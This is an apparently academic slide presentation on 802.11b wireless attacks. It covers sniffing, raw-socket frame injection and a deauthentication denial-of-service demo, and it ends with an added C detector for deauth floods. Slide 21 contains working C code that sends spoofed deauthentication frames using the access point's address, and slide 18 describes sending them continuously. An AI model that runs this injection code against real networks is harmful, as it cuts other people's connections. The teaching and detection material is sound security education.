802.11 Attack Demo

Provided by: lia9

1
802.11 Attack Demo
  • Haobo Zhou
  • (hzhou_at_liacs.nl)
  • LIACS
  • http://www.liacs.nl/home/hzhou

2
What Will Be Covered
  • Overview of 802.11b
  • Wireless network sniffer
  • Frame Injection
  • Deauth/Disassociation Attack
  • Attack Demo

3
NO!! Thanks
OK !!
Dinner??
4
ISO OSI Model and 802.11b
Overview of 802.11b
Obtained from http://alpha.fdu.edu/kanoksri/IEEE80211b.html
5
Overview of 802.11b
  • Runs in the 2.4 GHz band
  • DSSS - Direct Sequence Spread Spectrum
  • Channels
  • FCC (US) - 11 Channels (1-11)
  • ETSI (EU) - 13 Channels (1-13)
  • France - 4 Channels (10-13)
  • Japan - 14 Channels (1-14)
  • Uses CSMA/CA

6
Overview of 802.11b
  • Uses WEP for Encryption
  • Wired Equivalent Privacy
  • Uses RC4
  • 40-bit or 104-bit static key with 24-bit IV

7
Overview of 802.11b
  • Consists of 3 main protocol types
  • Management
  • Control
  • Data

8
Overview of 802.11b
Ad Hoc
9
Overview of 802.11b
Infrastructure
10
Overview of 802.11b
Node
Access Point
Access Point Accepts Node
Node is Associated
11
Wireless network sniffer
  • Wireless network detection
  • NIC with monitor mode support
  • Why?
  • Management frames
  • Frames belonging to others
  • Tools
  • Kismet
  • others

12
Wireless network sniffer
  • Network Interface Card Mode
  • Managed (Infrastructure)
  • Ad-Hoc (Ad Hoc)
  • Monitor (hardware support?)
  • Master (acts as an AP)

13
Wireless network sniffer
  • KISMET
  • An 802.11 layer2 wireless network sniffer
  • Working on Linux
  • Ethereal/Tcpdump compatible data logging
  • Over 20 supported card types
  • Open source code

14
Kismet
15
Frame Injection
  • NIC
  • support ?
  • Device Driver
  • support frame injection?
  • Yes- very good
  • NO- Change it!
  • User program

16
Frame Injection
  • User program
  • C code on Linux
  • RAW socket programming
  • Use PF_PACKET interface to access the link layer
  • sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

17
Deauthentication Attack
  • Management frames can control link
    characteristics and physical medium properties
  • 802.11b management frames are NOT authenticated
  • Why is this bad?

18
Deauthentication Attack
  • Denial of Service: De-authentication
  • Use MAC address of Access Point
  • Send deauthenticate frames
  • Send continuously
  • Users are unable to reassociate with AP

19
Deauthentication Attack
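  • State 1: Unauthenticated, Unassociated
  • State 2: Authenticated, Unassociated
  • State 3: Authenticated, Associated
  • State 1 → State 2: successful authentication
  • State 2 → State 3: successful association
  • State 3 → State 2: disassociation
  • State 2 → State 1 and State 3 → State 1: deauthentication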
20
Deauthentication Attack
Deauth frame structure
21
Deauthentication Attack
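    /* sd: the PF_PACKET raw socket opened as on slide 16 */
    void send_deauth(__u8 *dst, __u8 *bssid)
    {
        struct {
            struct a3_80211 hdr;    /* 802.11 header with three addresses */
            __u16 reason;           /* deauthentication reason code */
        } mgt_frame;

        memset(&mgt_frame, 0, sizeof(mgt_frame));
        mgt_frame.hdr.mh_type = FC_TYPE_MGT;
        mgt_frame.hdr.mh_subtype = MGT_DEAUTH;
        memcpy(mgt_frame.hdr.mh_mac1, dst, 6);      /* address 1: destination */
        memcpy(mgt_frame.hdr.mh_mac2, bssid, 6);    /* address 2: source, set to the AP */
        memcpy(mgt_frame.hdr.mh_mac3, bssid, 6);    /* address 3: BSSID */
        mgt_frame.reason = 2;
        send(sd, &mgt_frame, sizeof(mgt_frame), 0);
    }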
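
For the defensive side of slides 17-21, the following added example (not code from the presentation) parses a captured deauthentication frame with the layout used above and raises an alert when deauths for one BSSID exceed a rate threshold. The window length, threshold, sample frame bytes and all function names are assumptions chosen for illustration.

```c
/* Added example, not from the slides: frames, addresses, thresholds constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define WINDOW_MS 1000u  /* assumed observation window */
#define THRESHOLD 5u     /* assumed: more deauths than this per window = flood */

struct deauth_info { uint8_t dst[6], src[6], bssid[6]; uint16_t reason; };
struct flood_state { uint8_t bssid[6]; uint32_t start_ms; unsigned count; };

/* Parse a bare 802.11 frame (capture header already stripped). Returns 1 and
   fills *out for a deauthentication frame: type 0 (management), subtype 12. */
int parse_deauth(const uint8_t *f, size_t len, struct deauth_info *out)
{
    if (len < 26) return 0;                  /* 24-byte header + reason code */
    if ((f[0] & 0x0f) != 0 || (f[0] >> 4) != 12) return 0; /* version, type, subtype */
    memcpy(out->dst, f + 4, 6);              /* address 1 */
    memcpy(out->src, f + 10, 6);             /* address 2 */
    memcpy(out->bssid, f + 16, 6);           /* address 3 */
    out->reason = (uint16_t)(f[24] | (f[25] << 8));  /* little-endian */
    return 1;
}

/* Count deauths for the watched BSSID in fixed windows; returns 1 on alert. */
int feed(struct flood_state *s, const uint8_t *f, size_t len, uint32_t t_ms)
{
    struct deauth_info d;
    if (!parse_deauth(f, len, &d) || memcmp(d.bssid, s->bssid, 6)) return 0;
    if (t_ms - s->start_ms >= WINDOW_MS) { s->start_ms = t_ms; s->count = 0; }
    return ++s->count > THRESHOLD;
}

/* Feed n constructed deauth frames gap_ms apart; returns the number of alerts. */
int run_sample(unsigned n, uint32_t gap_ms)
{
    uint8_t f[26] = { 0xC0, 0x00, 0, 0,                 /* frame control, duration */
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff,             /* addr1: broadcast */
        0x02, 0, 0, 0, 0, 0x01, 0x02, 0, 0, 0, 0, 0x01, /* addr2, addr3: BSSID */
        0, 0, 0x02, 0x00 };                             /* seq ctrl, reason 2 */
    struct flood_state s = { { 0x02, 0, 0, 0, 0, 0x01 }, 0, 0 };
    int alerts = 0;
    for (unsigned i = 0; i < n; i++) alerts += feed(&s, f, sizeof f, i * gap_ms);
    return alerts;
}

int main(void)
{
    printf("burst: %d alerts, sparse: %d alerts\n", run_sample(10, 20), run_sample(10, 600));
    return 0;
}
```

Because management frames are not authenticated, the source address in a deauth frame cannot be trusted, so the detector keys on rate per BSSID rather than on who claims to have sent the frame.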

22
Questions? The deauth-attack demo continues
23
802.11 Deauth-attack DEMO
Attacker
  • Hardware
  • Laptop
  • Wireless card
  • Atheros 5212 chip
  • Monitor mode support
  • Software
  • Device Driver
  • Madwifi
  • Open source project
  • Two patches to enable frame injection
  • User program
  • Fata_jace.c

Victim
  • Hardware
  • Laptop
  • Wireless card
  • Software
  • Ping
  • Use ping to verify the connection
24
  • Thanks
  • Xu Li
  • Wei Wang
  • Google